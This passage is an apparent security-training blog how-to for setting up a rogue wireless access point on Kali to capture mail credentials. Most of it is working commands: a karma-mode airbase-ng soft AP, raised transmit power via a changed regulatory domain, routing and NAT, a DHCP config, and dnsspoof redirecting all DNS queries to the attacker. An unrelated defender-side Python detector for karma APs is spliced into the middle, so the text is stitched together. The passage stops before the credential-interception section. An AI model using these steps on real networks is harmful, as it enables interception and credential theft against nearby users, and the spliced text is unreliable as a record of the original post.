rss-bridge 2013-07-12T12:44:29+00:00

Rogue Access Points, a how-to

In preparation for our wireless training course at BlackHat Vegas in a few weeks, I spent some time updating the content on rogue/spoofed access points. What we mean by this are access points under your control, that you attempt to trick a user into connecting to, rather than the “unauthorised access points” Bob in Marketing bought and plugged into your internal network for his team to use.

I’ll discuss how to quickly get a rogue AP up on Kali that will allow you to start gathering some creds, specifically mail creds. Once you have that basic pattern down, setting up more complex attacks is fairly easy.

This is a fairly detailed “how-to” style blog entry that gives you a taste of what you can grab on our training course.

Preparation

First up, you’ll need a wireless card that supports injection. The aircrack forums maintain a list. I’m using the Alfa AWUS036H. Students on our course each get one of these to keep. We buy them from Rokland who always give us great service.

Second, you’ll need a laptop running Kali. The instructions here are pretty much the same for BackTrack (deprecated, use Kali).

For this setup, you won’t need upstream internet connectivity. In many ways setting up a “mitm” style rogue AP is much easier, but it requires that you have upstream connectivity which means you have to figure out an upstream connection (if you want to be mobile this means buying data from a mobile provider) and prevents you from using your rogue in funny places like aeroplanes or data centres. We’re going to keep things simple.

Finally, you’ll need to install some packages, I’ll discuss those as we set each thing up.

Overview

We’re going to string a couple of things together here:

Access Point  <-> routing & firewalling <-> DHCP <-> spoof services (DNS & mail)

There are several ways you can do each of these depending on preference and equipment. I’ll cover some alternatives, but here I’m going for quick and simple.

Access Point

Ideally, you should have a fancy wifi card with a Prism chipset that you can put into master mode, and have (digininja’s karma patched) hostapd play nicely with. But, we don’t have one of those, and will be using airbase-ng’s soft ap capability. You won’t get an AP that scales particularly well, or has decent throughput, or even guarantees that people can associate, but it’s often good enough.

For this section, we’ll use a few tools:

  • airbase-ng (via the aircrack-ng suite)
  • macchanger
  • iw

You can install these with: apt-get install aircrack-ng macchanger iw

First, let’s practise some good opsec and randomise our MAC address, then, while we’re at it, push up our transmit power. Assuming our wifi card has shown up as the device wlan0 (you can check with airmon-ng), we’ll run:

ifconfig wlan0 down
macchanger -r wlan0 #randomise our MAC
iw reg set BO #change our regulatory domain to something more permissive
ifconfig wlan0 up
iwconfig wlan0 txpower 30 #1 Watt transmit power

Right, now we can set up the AP using airbase. We have some options, with the biggest being whether you go for a KARMA style attack, or a point-network spoof.

airmon-ng start wlan0 #Put our card into monitor mode
airbase-ng -c6 -P -C20 -y -v mon0& #Set up our soft AP in karma mode
#airbase-ng -c6 -e "Internet" -v mon0& #Alternatively, set up our soft AP for 1 net (no karma)

Airbase has a couple of different ways to work. I’ll explain the parameters:

  • -c channel, check which channel is the least occupied with airodump
  • -P (karma mode) respond to all probes, i.e. if a victim’s device usually connects to the open network “Internet”, it will probe to see if that network is nearby. Our AP will see the probe and helpfully respond. The device, not knowing that this isn’t an ESS for the Internet network, will join our AP.
  • -y don’t respond to broadcast probes, aka the “is there anyone out there” shout of wifi. This helps in busy areas to reduce the AP’s workload
  • -C20 after a probed for network has been seen, send beacons with that network name out for 20 seconds afterwards. If you’re having trouble connecting, increasing this can help, but not much
  • -v be verbose
  • -e “Internet” pretend to be a specific fake ESSID. Using airodump and monitoring for probed networks from your victim, and just pretending to be that network (i.e. drop -P and -y) can increase reliability for specific targets.

If you’re putting this into a script, make sure to background the airbase process (the &). At this point, you should have an AP up and running.
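A defender-side check for the karma behaviour described above, added here as an example and not part of the original post: a normal AP only answers probe requests for the SSIDs it actually serves, so one BSSID answering probes for many unrelated SSIDs is a strong hint of a soft AP in karma mode. The frame records and the threshold are constructed assumptions; a real deployment would feed it frames parsed from a monitor-mode capture.

```python
"""Heuristic detector for KARMA-style soft APs.

An AP in karma mode (airbase-ng -P) answers probe requests for *any*
SSID, so a single BSSID ends up sending probe responses for many
unrelated network names. Frames below are constructed samples.
"""
from collections import defaultdict

# Constructed sample of 802.11 management frames: (subtype, bssid, ssid).
SAMPLE_FRAMES = [
    ("probe_resp", "00:11:22:33:44:55", "CorpWifi"),
    ("beacon",     "00:11:22:33:44:55", "CorpWifi"),
    ("probe_resp", "66:77:88:99:aa:bb", "Internet"),
    ("probe_resp", "66:77:88:99:aa:bb", "HomeNet"),
    ("probe_resp", "66:77:88:99:aa:bb", "CoffeeShop"),
    ("probe_resp", "66:77:88:99:aa:bb", "Airport_Free"),
    ("beacon",     "66:77:88:99:aa:bb", "Internet"),
    ("probe_resp", "cc:dd:ee:ff:00:11", "GuestNet"),
    ("probe_resp", "cc:dd:ee:ff:00:11", "CorpWifi"),
]


def ssids_per_bssid(frames):
    """Map each BSSID to the set of SSIDs it has sent probe responses for."""
    seen = defaultdict(set)
    for subtype, bssid, ssid in frames:
        if subtype == "probe_resp" and ssid:
            seen[bssid.lower()].add(ssid)
    return seen


def flag_karma_aps(frames, threshold=3):
    """Return BSSIDs (sorted) that answered probes for at least `threshold`
    distinct SSIDs. The threshold is an assumed, tunable value: legitimate
    multi-SSID APs normally use a distinct BSSID per SSID."""
    return sorted(b for b, s in ssids_per_bssid(frames).items()
                  if len(s) >= threshold)


if __name__ == "__main__":
    per_bssid = ssids_per_bssid(SAMPLE_FRAMES)
    for bssid in flag_karma_aps(SAMPLE_FRAMES):
        print(f"possible karma AP: {bssid} -> {sorted(per_bssid[bssid])}")
```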

Routing & IP Time

There are lots of options here: you could bridge the AP and your upstream interface, or you could NAT (NB you can’t NAT from wifi to wifi). We’re not using an upstream connection, so things are somewhat simpler; we’re just going to give our AP an IP and add a route for its network. It’s all standard unix tools here.

The basics:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo '1' > /proc/sys/net/ipv4/ip_forward

This is good enough for our no upstream AP, but if you wanted to use an upstream bridge, you could use the following alternates:

apt-get install bridge-utils #To get the brctl tool, only run this once
brctl addbr br0
brctl addif br0 eth0 #Assuming eth0 is your upstream interface
brctl addif br0 at0
ifconfig br0 up

If you wanted to NAT, you could use:

iptables --policy INPUT ACCEPT #Good housekeeping, clean the tables first
iptables --policy OUTPUT ACCEPT #Don't want to clear rules with a default DENY
iptables --policy FORWARD ACCEPT
iptables -t nat -F
iptables -F
#The actual NAT stuff
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i at0 -o eth0 -j ACCEPT

Legitimate Services

We need to have a fully functioning network, which requires some legitimate services. For our purposes, we only really need one, DHCP. Metasploit does have a dhcpd service, but it seems to have a few bugs. I’d recommend using the standard isc-dhcp-server in Kali which is rock solid.

apt-get install isc-dhcp-server #Only run this once
cat >> dhcpd.conf #We need to write the dhcp config file
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
^D #If you chose this method of writing the file, hit Ctrl-D
dhcpd -cf dhcpd.conf

Evil Services

We’re going to cover three evil services here:

  • DNS spoofing
  • Captive portal detection avoidance
  • Mail credential interception services

DNS spoofing

Once again, there are a couple of ways you can do DNS spoofing. The easiest is to use Dug Song’s dnsspoof. An alternative would be to use metasploit’s fakedns, but I find that makes the metasploit output rather noisy. Since there’s no upstream, we’ll just spoof all DNS queries to point back to us.

apt-get install dsniff #Only run the first time :)
cat >> dns.txt
10.0.0.1 *
^D #As in hit Ctrl-D
dnsspoof -i at0 -f dns.txt& #Remember to background it if in a script

Captive Portal Detection Avoidance

[...]

